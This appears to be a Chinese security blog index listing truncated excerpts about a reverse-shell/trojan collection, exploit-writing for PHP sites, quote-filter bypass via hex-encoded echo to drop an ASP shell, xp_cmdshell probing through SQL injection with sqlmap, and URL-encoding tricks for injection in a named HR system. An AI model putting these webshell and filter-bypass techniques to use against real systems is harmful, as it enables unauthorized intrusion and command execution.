木马、反弹shell 合集

反弹 shellASPX<%@ Page Language="C#" %> <%@ Import Namespace="System.Runtime.InteropServices" %> <%@ Import Namespace="System.Net" %> <%@ Import Nam...

写PHP站的exp时遇到的问题总结

小马传大马的思想 鸿宇多用户商城 user.php 任意命令执行漏洞 通过命令执行的点,传入 PHP代码。 写入 PHP 代码到文件中,可以先写成 txt 的文件格式,查看写入的内容是否被拦截,是否被解析了。 当前的状态是可以命令执行,在命令执行的部分,直接echo 的方式,进行php 马的写入,可能会失败。这时候,可以先写入txt看看,写入的php函数是否被解析了。 我今天遇到的是...

写exp时遇到的问题(普遍版)

引号被过滤今天命令执行,想要上传马,遇到了引号被过滤掉的问题。最终找到了三种方式来解决。 用echo -e 对它16进制编码 echo -e "\x22hello\x22" >> a.asp 因为它本身的asp里面有引号,我通过它仅有的命令head和cut,把它摘到了我的上传文件中 head -n 1 home.asp | cut -c 23 >...

sql 注入xpcmdshell相关问题

sql注入select * from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’select count(*) from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’ // 存在返回1 python .\sqlmap.py -r .\po...

URL 编码问题

漏洞录入《宏景人力资源信息管理系统 codesettree 接口 SQL 注入漏洞》,汲取的灵感。 那个编码,对一些特殊字符,用百分号+十六进制的骚方法。。。。先普通url一次之后,再对一些特殊字符编码。他不是简单的多次url编码。这是另一种url编码。叫encodeURIComponent,这是java中的一个类。 java对url编码有两种方式,一个是encodeURI,一个是enc...